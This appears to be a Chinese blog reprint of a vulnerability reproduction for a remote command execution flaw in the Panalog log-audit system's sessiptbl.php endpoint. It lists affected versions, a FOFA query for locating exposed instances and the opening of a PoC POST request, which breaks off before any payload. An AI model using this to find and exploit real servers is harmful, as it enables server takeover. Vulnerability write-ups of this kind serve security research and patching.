热门标签
热门文章
- 1/etc/kubernetes/bootstrap-kubelet.conf: no such file or directory“_stat /etc/kubernetes/bootstrap-kubelet.conf: no su
- 2一文读懂国内外开源大模型特性及发展
- 3新手配置 Jetty + Eclipse (Hot code debugging)
- 4UDP协议开发_udp模块所有开发版都有吗
- 5Node.js 安装与版本管理(nvm 的使用)_node版本管理
- 6阿里云Web应用防火墙价格表_服务器防火墙软件多少钱
- 7腾讯云服务器标准型S2和标准型S3的区别如何选择?_s2和s3合金钢材区别
- 8如何用stata画莫兰散点图_如何用stata做空间倍差分DID(2)之SDMDID
- 9VT驱动开发_vmxon
- 10python导入csv报错_python-pd.read_csv中的字符串行索引导致错误“...
当前位置: article > 正文
Panalog 日志审计系统 sessiptbl.php 前台RCE漏洞复现
作者:不正经 | 2024-02-19 14:36:00
赞
踩
Panalog 日志审计系统 sessiptbl.php 前台RCE漏洞复现
0x01 产品简介
Panalog是一款日志审计系统,方便用户统一集中监控、管理在网的海量设备。
0x02 漏洞概述
Panalog日志审计系统 sessiptbl.php接口处存在远程命令执行漏洞,攻击者可执行任意命令,接管服务器权限。
0x03 影响范围
version <= MARS r10p1Free
0x04 复现环境
FOFA:app="Panabit-Panalog"
0x05 漏洞复现
PoC
- POST /sessiptbl.php HTTP/1.1
- Host: your-ip
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
- Content-Type: application/x-www-form-urlencoded
- Accept-Enco
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/不正经/article/detail/115261?site
推荐阅读
相关标签
